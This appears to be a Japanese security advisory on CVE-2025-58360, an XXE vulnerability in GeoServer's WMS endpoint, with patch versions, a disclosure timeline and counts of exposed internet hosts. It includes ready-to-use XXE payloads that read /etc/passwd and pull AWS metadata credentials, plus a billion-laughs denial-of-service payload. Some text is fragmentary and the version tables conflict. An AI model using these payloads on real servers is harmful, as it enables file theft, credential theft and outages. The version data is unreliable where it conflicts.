
CVE-2025-58360

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:LこれはWeb Map Service(WMS)GetMapエンドポイントにおける古典的だが壊滅的なXXEです。
攻撃者は以下が可能です:
/etc/passwd、geoserver.xml、秘密鍵など)→ 現在、数万の潜在的に脆弱なサーバーがオープンインターネット上に存在しています!🌐
エンドポイント: POST /geoserver/wms
キーパラメータ: SLD_BODY(生のXMLスタイルを許可)
脆弱なコードパス: XMLパーサーが外部エンティティ解決を無効にしていない → 古典的なXXE。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
<sld:UserLayer>
<sld:LayerFeatureConstraints>
<sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
</sld:LayerFeatureConstraints>
</sld:UserLayer>
</sld:StyledLayerDescriptor>
→ レスポンスに /etc/passwd の内容が含まれます 🎉
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
→ EC2上で実行している場合、一時的なAWS認証情報が漏洩します。
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!-- lol9まで繰り返し -->
]>
<lol>&lol9;</lol>
→ 数秒で数ギガバイトのRAMを消費します 💥
| バージョン | リリース日 | ダウンロードリンク |
|---|---|---|
| 2.27.0 | 2025年11月25日 | https://geoserver.org/release/stable/ |
| 2.26.3 | 2025年11月25日 |
Dockerユーザー向け:
docker pull osgeo/geoserver:2.27.0
<!ENTITY または SYSTEM "file://" を含むリクエストを拒否| 日付 | イベント |
|---|---|
| 2025年11月以前 | XBOW AIスキャナーによって自律的に発見 |
| 2025年11月25日 | 調整された開示 → パッチリリース |
| 2025年11月25日 | CVE割り当て・公開 |
| 2025年11月26日 | PoCが拡散し、露出スキャンが急増 |
これは、広く展開されている地理空間プラットフォームを標的とし、数万ものインターネットに露出したインスタンスが影響を受ける教科書的なXXEです。
パッチは開示と同日にリリースされました — GeoServerチームの迅速な対応に大きな拍手を!🏆
しかし、パッチが利用可能になってから大規模な悪用が始まるまでの猶予は急速に縮まっています。
GeoServerを運用している場合 → 今すぐアップグレードを。
次のニュースの見出しにならないでください。
セキュリティを保ち、輝き続けましょう!🛡️✨
| コンポーネント | 脆弱なバージョン | 修正バージョン | ステータス |
|---|
| GeoServer Standalone | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.3, 2.25.6, 2.27.0 | 🔴 脆弱 |
| Docker (osgeo/geoserver) | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.27.0 | 🔴 脆弱 |
| Maven org.geoserver:gs-wms | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.25.6 | 🔴 脆弱 |
| Maven org.geoserver.web:gs-web-app | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.25.6 | 🔴 脆弱 |
| GeoServer 2.27.x 以降 | – | 既にパッチ済み | ✅ 安全 |
| ソース | 露出インスタンス数 | 備考 |
|---|
| ZoomEye | ~49,400 | app:"GeoServer" 検索 |
| FOFA | ~24,000 | 過去1年間の結果 |
| Shodan | ~31,000 | ポート8080 + タイトル一致 |
| GobySec | ~20,000 | 公開ネットワークスキャン |
| メンテナンスブランチパッチ |
| 2.25.6 | 2025年11月25日 | 旧サポートブランチ |